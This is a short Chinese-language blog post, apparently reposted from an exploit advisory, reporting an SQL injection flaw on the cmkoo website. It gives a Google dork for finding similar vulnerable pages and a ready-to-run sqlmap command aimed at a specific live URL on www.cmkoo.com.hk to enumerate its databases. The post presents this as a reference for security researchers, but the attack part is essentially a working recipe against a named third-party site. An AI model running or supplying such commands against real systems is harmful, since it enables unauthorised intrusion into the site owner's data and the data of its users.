cmkoo 网站SQL注入漏洞技术分析

本文详细分析了cmkoo网站存在的SQL注入安全漏洞,介绍了漏洞的发现过程、利用方法以及具体的渗透测试指令,为安全研究人员提供了实际的技术参考。

cmkoo - SQL 注入

2025.12.21 作者: javad rashidi

风险等级: 中等 本地利用:远程利用:CVE 编号:CWE 编号:搜索关键词: inurl:"news.php?id="

漏洞详情

漏洞标题: cmkoo - SQL 注入 发现日期: 2025-12-18 漏洞作者: javad rashidi 测试环境: Windows,Linux 谷歌搜索关键词: inurl:"news.php?id="

利用方法

使用 sqlmap 进行自动化注入测试:

1

sqlmap -u "http://www.cmkoo.com.hk/en/news/news.php?id=28" --dbs

该命令针对目标URL http://www.cmkoo.com.hk/en/news/news.php?id=28 执行SQL注入攻击,并尝试枚举数据库名称(--dbs 参数)。

comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次